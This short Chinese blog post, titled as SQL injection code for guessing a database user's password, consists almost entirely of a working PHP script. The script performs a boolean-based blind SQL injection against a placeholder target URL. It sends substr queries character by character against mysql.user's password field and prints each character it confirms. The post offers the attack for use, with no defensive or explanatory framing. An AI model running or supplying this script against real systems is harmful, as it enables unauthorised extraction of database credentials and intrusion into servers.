一段代码,SQL注入猜解数据库用户密码

PHP

    set_time_limit(0);
    $base = "网址";
    $arr1 = range('A','G');
    $arr2 = range(0,9);
    $arr = array_merge($arr1,$arr2);
    $arr[] = '*';
    $ch = curl_init();
    for($i=34; $i<50; $i++){
        foreach($arr as $key=>$value){
                $query = urlencode("46 and (select substr((select password from mysql.user limit 1),".$i.",1))='".$value."'");
                $url = $base.$query;
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                $back = curl_exec($ch);
                /*$code = curl_getinfo($ch,CURLINFO_HTTP_CODE);
                if($code == 200){
                    echo $value;
                    break;
                }
                */
                if(!strpos($back,'error.jsp')){
                    echo $value;
                    break;
                }
        }
    }

?>

 

你可能感兴趣的:(一段代码,SQL注入猜解数据库用户密码)